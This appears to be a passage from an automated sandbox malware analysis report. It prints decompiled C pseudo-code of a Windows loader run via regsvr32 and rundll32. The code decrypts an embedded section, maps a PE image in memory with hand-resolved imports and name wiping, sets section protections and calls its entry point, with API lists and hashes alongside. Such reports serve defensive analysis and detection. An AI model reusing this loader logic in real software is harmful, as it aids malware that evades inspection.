				intOrPtr* _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t42;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed int _t61;
				intOrPtr _t78;
				void* _t79;

				_t78 =  *0x404130;
				_t42 = E00401C8A(_t78,  &_v24,  &_v16);
				_v20 = _t42;
				if(_t42 == 0) {
					asm("sbb ebx, ebx");
					_t61 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t79 = _t78 + _v24;
					_v40 = _t79;
					_t49 = VirtualAlloc(0, _t61 << 0xc, 0x3000, 4); // executed
					_v28 = _t49;
					if(_t49 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t61 <= 0) {
							_t50 =  *0x404140;
						} else {
							_t53 = _t49 - _t79;
							_v32 = _t53;
							_v36 = _t53 + _a4 + 0x4051a2;
							_v12 = _t79;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("rol edx, cl");
								E00401908(_v12 + _t53, _v12, (_v52 ^ _v48) + _v24 + _a4);
								_t50 =  *_v36 +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								_v12 = _v12 + 0x1000;
								 *0x404140 = _t50;
								if(_v8 >= _t61) {
									break;
								}
								_t53 = _v32;
							}
						}
						if(_t50 != 0x59935a40) {
							_v20 = 0xc;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}





















                                          0x00401b76
                                          0x00401b86
                                          0x00401b8b
                                          0x00401b90
                                          0x00401ba5
                                          0x00401bac
                                          0x00401bb1
                                          0x00401bc2
                                          0x00401bc5
                                          0x00401bcb
                                          0x00401bd0
                                          0x00401c7a
                                          0x00401bd6
                                          0x00401bd6
                                          0x00401bdc
                                          0x00401c42
                                          0x00401bde
                                          0x00401be1
                                          0x00401beb
                                          0x00401bee
                                          0x00401bf1
                                          0x00401bf9
                                          0x00401c04
                                          0x00401c05
                                          0x00401c06
                                          0x00401c15
                                          0x00401c1e
                                          0x00401c28
                                          0x00401c2b
                                          0x00401c2e
                                          0x00401c35
                                          0x00401c3d
                                          0x00000000
                                          0x00000000
                                          0x00401bf6
                                          0x00401bf6
                                          0x00401c3f
                                          0x00401c4c
                                          0x00401c61
                                          0x00401c4e
                                          0x00401c57
                                          0x00401c5c
                                          0x00401c72
                                          0x00401c72
                                          0x00401c81
                                          0x00401c87

                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00401BC5
                                          • memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,004011FF,-00000008), ref: 00401C57
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00401C72
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp Download File
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocFreememcpy
                                          • String ID: Dec 1 2020
                                          • API String ID: 4010158826-3539646581
                                          • Opcode ID: 32c0fd6cd0e560628df818c122f9bc710d565fa041d472fb92a728a2ba1876ef
                                          • Instruction ID: 7f1b2ce798264bf0d6a8f85b7c0a69cde3afc58837c30a78efdd4273d4b3b3bf
                                          • Opcode Fuzzy Hash: 32c0fd6cd0e560628df818c122f9bc710d565fa041d472fb92a728a2ba1876ef
                                          • Instruction Fuzzy Hash: A1313071D40219EFEB01CF94D985BEEBBB9FF48304F108166E901BB290D775AA05DB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401EB4, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 108 401eb4-401eea VirtualProtect 109 401f57-401f5e 108->109 110 401eec 108->110 111 401eef-401ef3 110->111 111->109 112 401ef5-401ef9 111->112 113 401f11-401f15 112->113 114 401efb-401f0f 112->114 116 401f27-401f29 113->116 117 401f17-401f25 113->117 115 401f2a-401f3e VirtualProtect 114->115 118 401f40-401f46 GetLastError 115->118 119 401f49-401f55 115->119 116->115 117->115 118->119 119->109 119->111
                                          C-Code - Quality: 82%
                                          			E00401EB4(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				signed int _t31;
				long _t33;
				int _t34;
				signed int _t35;
				signed int _t42;
				void* _t50;
				void* _t51;
				signed int _t54;

				_v12 = _v12 & 0x00000000;
				_t42 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t42;
				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t42 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t33 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							_t35 = 0;
							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb eax, eax");
						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
					}
					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
					if(_t34 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					_t31 = _v8;
					if(_t31 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}















                                          0x00401ebe
                                          0x00401ec3
                                          0x00401ecf
                                          0x00401edc
                                          0x00401ee2
                                          0x00401ee4
                                          0x00401eea
                                          0x00401f57
                                          0x00401f5e
                                          0x00401f5e
                                          0x00401eec
                                          0x00401eef
                                          0x00401eef
                                          0x00401ef3
                                          0x00000000
                                          0x00000000
                                          0x00401ef5
                                          0x00401ef9
                                          0x00401f11
                                          0x00401f15
                                          0x00401f29
                                          0x00401f17
                                          0x00401f17
                                          0x00401f1d
                                          0x00401f21
                                          0x00401f21
                                          0x00401efb
                                          0x00401efb
                                          0x00401f07
                                          0x00401f0c
                                          0x00401f0c
                                          0x00401f3a
                                          0x00401f3e
                                          0x00401f46
                                          0x00401f46
                                          0x00401f49
                                          0x00401f4c
                                          0x00401f4f
                                          0x00401f55
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00401f55
                                          0x00000000

                                          APIs
                                          • VirtualProtect.KERNEL32(00000000,?,00000004,?,?,?,00000000,?,?), ref: 00401EE2
                                          • VirtualProtect.KERNEL32(00000000,00000000,00000004,?), ref: 00401F3A
                                          • GetLastError.KERNEL32 ref: 00401F40
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp Download File
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$ErrorLast
                                          • String ID:
                                          • API String ID: 1469625949-0
                                          • Opcode ID: d42b9694a72ed66c8d4bf4030c7debaad441bb12af55e53d9f669dbd87f6c113
                                          • Instruction ID: e27f798609edaf5a41536db7e4197137949ffbb15464d1b66648336e133202e0
                                          • Opcode Fuzzy Hash: d42b9694a72ed66c8d4bf4030c7debaad441bb12af55e53d9f669dbd87f6c113
                                          • Instruction Fuzzy Hash: ED21C37290020AEFDB20DF94CC80EBEB7B4FF14315F10456AE641A7192D3789A89CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004016E4, Relevance: 4.6, APIs: 3, Instructions: 62stringthreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 120 4016e4-4016fb 121 401705 120->121 122 4016fd-401703 120->122 123 40170b-401738 call 401000 call 401d86 121->123 122->123 128 401791-401793 123->128 129 40173a-40175f lstrlenW call 4010fc 123->129 131 401794-401795 ExitThread 128->131 133 401761-40176e 129->133 134 401786-40178a call 401adc 129->134 135 401780-401782 133->135 136 401770-40177e memcpy 133->136 138 40178f 134->138 135->134 136->134 138->131
                                          C-Code - Quality: 100%
                                          			E004016E4() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				intOrPtr _t30;
				void* _t32;
				signed int _t35;
				intOrPtr* _t37;
				intOrPtr _t39;
				int _t44;

				_t15 =  *0x404144;
				if( *0x40412c > 5) {
					_t16 = _t15 + 0x4050f4;
				} else {
					_t16 = _t15 + 0x4050b1;
				}
				E00401000(_t16, _t16);
				_t35 = 6;
				memset( &_v32, 0, _t35 << 2);
				if(E00401D86( &_v32,  &_v16,  *0x404140 ^ 0xc786104c) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x404138);
					_t8 = _t26 + 2; // 0x2
					_t44 = _t26 + _t8;
					_t11 = _t44 + 8; // 0xa
					_t30 = E004010FC(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t37 = _v36;
						 *_t37 = _t30;
						_t32 =  *0x404138;
						if(_t32 == 0) {
							 *(_t37 + 4) = 0;
						} else {
							memcpy(_t37 + 4, _t32, _t44);
						}
					}
					_t25 = E00401ADC(_v28); // executed
				}
				ExitThread(_t25);
			}

















                                          0x004016ea
                                          0x004016fb
                                          0x00401705
                                          0x004016fd
                                          0x004016fd
                                          0x004016fd
                                          0x0040170c
                                          0x00401715
                                          0x0040171a
                                          0x00401738
                                          0x00401793
                                          0x0040173a
                                          0x00401740
                                          0x00401746
                                          0x00401746
                                          0x00401754
                                          0x00401758
                                          0x0040175f
                                          0x00401761
                                          0x00401765
                                          0x00401767
                                          0x0040176e
                                          0x00401782
                                          0x00401770
                                          0x00401776
                                          0x0040177b
                                          0x0040176e
                                          0x0040178a
                                          0x0040178a
                                          0x00401795

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp Download File
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: ExitThreadlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3726537860-0
                                          • Opcode ID: 91ba1139c3755cad229bb9d0445754134c7e8b55493b0356f5d3d0d93ac96fa6
                                          • Instruction ID: 8a4fee98c5b033481079d20f2ed09bf24140ca87285630fc1cd12ba5e166c3f8
                                          • Opcode Fuzzy Hash: 91ba1139c3755cad229bb9d0445754134c7e8b55493b0356f5d3d0d93ac96fa6
                                          • Instruction Fuzzy Hash: DA11BEB1504205ABD710DB61CE88E9777ECAB48354F00083AF645F71B1EB38E5498B9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401000, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 37%
                                          			E00401000(void* __eax, intOrPtr _a4) {

				 *0x404150 =  *0x404150 & 0x00000000;
				_push(0);
				_push(0x40414c);
				_push(1);
				_push(_a4);
				 *0x404148 = 0xc; // executed
				L004011CE(); // executed
				return __eax;
			}



                                          0x00401000
                                          0x00401007
                                          0x00401009
                                          0x0040100e
                                          0x00401010
                                          0x00401014
                                          0x0040101e
                                          0x00401023

                                          APIs
                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401711,00000001,0040414C,00000000), ref: 0040101E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp Download File
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: DescriptorSecurity$ConvertString
                                          • String ID:
                                          • API String ID: 3907675253-0
                                          • Opcode ID: 1398a2d7d33c37d288d581c0a9d4a1d94106b0c1403ca33d02dd1543a610cd86
                                          • Instruction ID: 6ca9f4561cfec6fb12a455dc8c2015ed6cdcf3fe680898d61d6bd483d8d3de7a
                                          • Opcode Fuzzy Hash: 1398a2d7d33c37d288d581c0a9d4a1d94106b0c1403ca33d02dd1543a610cd86
                                          • Instruction Fuzzy Hash: BAC04CF4251340A6E620AF409D4EF457A9177E4B05F210529B3103D1E193FA1094851D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401ADC, Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 144 401adc-401b08 call 401f61 147 401b65-401b67 144->147 148 401b0a-401b18 call 401ce4 144->148 150 401b68-401b6e 147->150 152 401b51-401b63 call 401938 148->152 153 401b1a-401b2a call 4015c2 148->153 152->150 153->152 157 401b2c-401b2f call 401eb4 153->157 161 401b34-401b38 157->161 161->152 163 401b3a-401b47 161->163 163->152 165 401b49-401b4f GetLastError 163->165 165->152
                                          C-Code - Quality: 84%
                                          			E00401ADC(void* __eax) {
				char _v8;
				void* _v12;
				void* _t17;
				long _t25;
				long _t28;
				intOrPtr* _t33;
				void* _t34;
				intOrPtr* _t35;
				intOrPtr _t37;

				_t34 = __eax;
				_t17 = E00401F61( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t28 = 8;
					goto L8;
				} else {
					_t33 = _v8;
					_t28 = E00401CE4( &_v8, _t33, _t34);
					if(_t28 == 0) {
						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
						_t28 = E004015C2(_t33, _t37);
						if(_t28 == 0) {
							_t25 = E00401EB4(_t37, _t33); // executed
							_t28 = _t25;
							if(_t28 == 0) {
								_push(_t25);
								_push(1);
								_push(_t33);
								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
									_t28 = GetLastError();
								}
							}
						}
					}
					_t35 = _v12;
					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
					E00401938(_t35);
					L8:
					return _t28;
				}
			}












                                          0x00401ae4
                                          0x00401b01
                                          0x00401b08
                                          0x00401b67
                                          0x00000000
                                          0x00401b0a
                                          0x00401b0a
                                          0x00401b14
                                          0x00401b18
                                          0x00401b1d
                                          0x00401b26
                                          0x00401b2a
                                          0x00401b2f
                                          0x00401b34
                                          0x00401b38
                                          0x00401b3d
                                          0x00401b3e
                                          0x00401b42
                                          0x00401b47
                                          0x00401b4f
                                          0x00401b4f
                                          0x00401b47
                                          0x00401b38
                                          0x00401b2a
                                          0x00401b51
                                          0x00401b5a
                                          0x00401b5e
                                          0x00401b68
                                          0x00401b6e
                                          0x00401b6e

                                          APIs
                                            • Part of subcall function 00401F61: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00401B06,?,?,?,?,00000002,?,0040178F), ref: 00401F86
                                            • Part of subcall function 00401F61: GetProcAddress.KERNEL32(00000000,?), ref: 00401FA8
                                            • Part of subcall function 00401F61: GetProcAddress.KERNEL32(00000000,?), ref: 00401FBE
                                            • Part of subcall function 00401F61: GetProcAddress.KERNEL32(00000000,?), ref: 00401FD4
                                            • Part of subcall function 00401F61: GetProcAddress.KERNEL32(00000000,?), ref: 00401FEA
                                            • Part of subcall function 00401F61: GetProcAddress.KERNEL32(00000000,?), ref: 00402000
                                            • Part of subcall function 00401CE4: memcpy.NTDLL(00000002,?,?,?,?,?,?,?,00401B14,?,?,?,?,?,?,00000002), ref: 00401D1B
                                            • Part of subcall function 00401CE4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 00401D50
                                            • Part of subcall function 004015C2: LoadLibraryA.KERNEL32 ref: 004015F8
                                            • Part of subcall function 004015C2: lstrlenA.KERNEL32 ref: 0040160E
                                            • Part of subcall function 004015C2: memset.NTDLL ref: 00401618
                                            • Part of subcall function 004015C2: GetProcAddress.KERNEL32(?,00000002), ref: 0040167B
                                            • Part of subcall function 004015C2: lstrlenA.KERNEL32(-00000002), ref: 00401690
                                            • Part of subcall function 004015C2: memset.NTDLL ref: 0040169A
                                            • Part of subcall function 00401EB4: VirtualProtect.KERNEL32(00000000,?,00000004,?,?,?,00000000,?,?), ref: 00401EE2
                                            • Part of subcall function 00401EB4: VirtualProtect.KERNEL32(00000000,00000000,00000004,?), ref: 00401F3A
                                            • Part of subcall function 00401EB4: GetLastError.KERNEL32 ref: 00401F40
                                          • GetLastError.KERNEL32(?,0040178F), ref: 00401B49
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp Download File
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 33504255-0
                                          • Opcode ID: b6f527419930b44f40a1ab1d95bac96fd40d74d3357100ee3652cfdc2a43ac8f
                                          • Instruction ID: 2ecac3e89fcf864c5ff4a590cc22b0cc7a05ea2076188f05a12d7ce61af00ae2
                                          • Opcode Fuzzy Hash: b6f527419930b44f40a1ab1d95bac96fd40d74d3357100ee3652cfdc2a43ac8f
                                          • Instruction Fuzzy Hash: 24118A726007116BD7216BA98C85EAB77BCAF54314B00013AF906F7391EB78FD0587A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 004015C2, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104librarystringloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 169 4015c2-4015db 170 4015e1-4015ed 169->170 171 4016dc-4016e1 169->171 172 4015f3 170->172 173 4016db 170->173 174 4015f4-401603 LoadLibraryA 172->174 173->171 175 4016d3 174->175 176 401609-401627 lstrlenA memset 174->176 179 4016da 175->179 177 401633-40163a 176->177 178 401629-40162d 176->178 180 4016c0-4016cb 177->180 181 401640-401647 177->181 178->177 178->180 179->173 180->174 182 4016d1 180->182 183 401649 181->183 182->179 184 401650-401652 183->184 185 40164b-40164e 183->185 186 401664-401669 184->186 187 401654-40165e 184->187 188 40166c-401671 185->188 186->188 187->186 189 401660-401662 187->189 190 401673 188->190 191 401677-401686 GetProcAddress 188->191 189->188 190->191 192 4016b6 191->192 193 401688-40168a 191->193 196 4016bd 192->196 194 4016a2-4016b2 193->194 195 40168c-40169f lstrlenA memset 193->195 194->183 197 4016b4 194->197 195->194 196->180 197->196
                                          C-Code - Quality: 100%
                                          			E004015C2(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				CHAR* _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed short _t54;
				intOrPtr* _t57;
				signed short _t59;
				CHAR* _t60;
				CHAR* _t62;
				signed short* _t64;
				void* _t65;
				signed short _t72;

				_t34 =  *((intOrPtr*)(_a8 + 0x80));
				_v8 = _v8 & 0x00000000;
				_t52 = _a4;
				if(_t34 == 0) {
					L28:
					return _v8;
				}
				_t57 = _t34 + _t52;
				_t36 =  *((intOrPtr*)(_t57 + 0xc));
				_a4 = _t57;
				if(_t36 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t62 = _t36 + _t52;
					_t37 = LoadLibraryA(_t62);
					_v16 = _t37;
					if(_t37 == 0) {
						break;
					}
					_v12 = _v12 & 0x00000000;
					memset(_t62, 0, lstrlenA(_t62));
					_t53 =  *_t57;
					_t40 =  *((intOrPtr*)(_t57 + 0x10));
					_t65 = _t65 + 0xc;
					if(_t53 != 0) {
						L6:
						_t64 = _t53 + _t52;
						_t54 =  *_t64;
						if(_t54 == 0) {
							L23:
							_t36 =  *((intOrPtr*)(_t57 + 0x20));
							_t57 = _t57 + 0x14;
							_a4 = _t57;
							if(_t36 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v20 = _t40 - _t64 + _t52;
						_t72 = _t54;
						L8:
						L8:
						if(_t72 < 0) {
							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
								_t59 = 0;
								_v12 =  *_t64 & 0x0000ffff;
							} else {
								_t59 = _t54;
							}
						} else {
							_t59 = _t54 + _t52;
						}
						_t20 = _t59 + 2; // 0x2
						_t44 = _t20;
						if(_t59 == 0) {
							_t44 = _v12 & 0x0000ffff;
						}
						_t45 = GetProcAddress(_v16, _t44);
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21;
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
						 *(_v20 + _t64) = _v24;
						_t64 =  &(_t64[2]);
						_t54 =  *_t64;
						if(_t54 != 0) {
							goto L8;
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}
























                                          0x004015cb
                                          0x004015d1
                                          0x004015d6
                                          0x004015db
                                          0x004016dc
                                          0x004016e1
                                          0x004016e1
                                          0x004015e2
                                          0x004015e5
                                          0x004015e8
                                          0x004015ed
                                          0x004016db
                                          0x00000000
                                          0x004016db
                                          0x004015f4
                                          0x004015f4
                                          0x004015f8
                                          0x004015fe
                                          0x00401603
                                          0x00000000
                                          0x00000000
                                          0x00401609
                                          0x00401618
                                          0x0040161d
                                          0x0040161f
                                          0x00401622
                                          0x00401627
                                          0x00401633
                                          0x00401633
                                          0x00401636
                                          0x0040163a
                                          0x004016c0
                                          0x004016c0
                                          0x004016c3
                                          0x004016c6
                                          0x004016cb
                                          0x00000000
                                          0x00000000
                                          0x004016da
                                          0x00000000
                                          0x004016da
                                          0x00401644
                                          0x00401647
                                          0x00000000
                                          0x00401649
                                          0x00401649
                                          0x00401652
                                          0x00401667
                                          0x00401669
                                          0x00401660
                                          0x00401660
                                          0x00401660
                                          0x0040164b
                                          0x0040164b
                                          0x0040164b
                                          0x0040166c
                                          0x0040166c
                                          0x00401671
                                          0x00401673
                                          0x00401673
                                          0x0040167b
                                          0x00401681
                                          0x00401686
                                          0x00000000
                                          0x00000000
                                          0x0040168a
                                          0x0040168c
                                          0x0040169a
                                          0x0040169f
                                          0x0040169f
                                          0x004016a8
                                          0x004016ab
                                          0x004016ae
                                          0x004016b2
                                          0x00000000
                                          0x004016b4
                                          0x004016bd
                                          0x004016bd
                                          0x00000000
                                          0x004016bd
                                          0x004016b6
                                          0x004016b6
                                          0x00000000
                                          0x004016b6
                                          0x00401629
                                          0x0040162d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040162d
                                          0x004016d3
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp Download File
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemset$AddressLibraryLoadProc
                                          • String ID: ~
                                          • API String ID: 1986585659-1707062198
                                          • Opcode ID: c459e5c4b2257f60a85b8f4a256c25176788778794111ee305b4c7d525299c5e
                                          • Instruction ID: 1541f1383029c81c561c658891bc730305bdf5491dfdc73c382b85a44619650c
                                          • Opcode Fuzzy Hash: c459e5c4b2257f60a85b8f4a256c25176788778794111ee305b4c7d525299c5e
                                          • Instruction Fuzzy Hash: 73316DB5A01206ABDB10CF55CC90AAEB7B8AF44344F25453AE805FB3A0D739EA41CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040179C, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 198 40179c-4017b8 CreateEventA 199 4017ba-4017c2 GetVersion 198->199 200 40180e-40180f GetLastError 198->200 201 4017c4-4017cb 199->201 202 4017cf 199->202 203 4017d1-4017fc GetCurrentProcessId OpenProcess 201->203 204 4017cd 201->204 202->203 205 401809-40180d 202->205 206 401805-401808 203->206 207 4017fe 203->207 204->202 207->206
                                          C-Code - Quality: 100%
                                          			E0040179C() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x404130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x40412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x404128 = _t5;
						 *0x404130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x404124 = _t6;
						if(_t6 == 0) {
							 *0x404124 =  *0x404124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                          0x0040179d
                                          0x004017ab
                                          0x004017b1
                                          0x004017b8
                                          0x0040180f
                                          0x0040180f
                                          0x004017ba
                                          0x004017c2
                                          0x004017cf
                                          0x004017cf
                                          0x0040180b
                                          0x0040180d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004017c4
                                          0x004017cb
                                          0x004017d1
                                          0x004017d1
                                          0x004017d6
                                          0x004017e4
                                          0x004017e9
                                          0x004017ef
                                          0x004017f5
                                          0x004017fc
                                          0x004017fe
                                          0x004017fe
                                          0x00401808
                                          0x004017cd
                                          0x004017cd
                                          0x00000000
                                          0x004017cd
                                          0x004017cb

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,004011E0), ref: 004017AB
                                          • GetVersion.KERNEL32(?,004011E0), ref: 004017BA
                                          • GetCurrentProcessId.KERNEL32(?,004011E0), ref: 004017D6
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,004011E0), ref: 004017EF
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp Download File
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentEventOpenVersion
                                          • String ID:
                                          • API String ID: 845504543-0
                                          • Opcode ID: aed06d6e456db0b12c0d945e50369df40b064ec9bd77893b2d6cd3ad5d18233c
                                          • Instruction ID: 8f8fe06e61bec74b5f5bb4dd3e414479b260bbff587dc6d4cb96878b245eb472
                                          • Opcode Fuzzy Hash: aed06d6e456db0b12c0d945e50369df40b064ec9bd77893b2d6cd3ad5d18233c
                                          • Instruction Fuzzy Hash: 6DF081B15413019BE7116F787E097553FA5A799713F104036E681FA2F8E37085818B5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: rundll32.exe PID: 5040 Parent PID: 3428 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 040832BA, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E040832BA(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
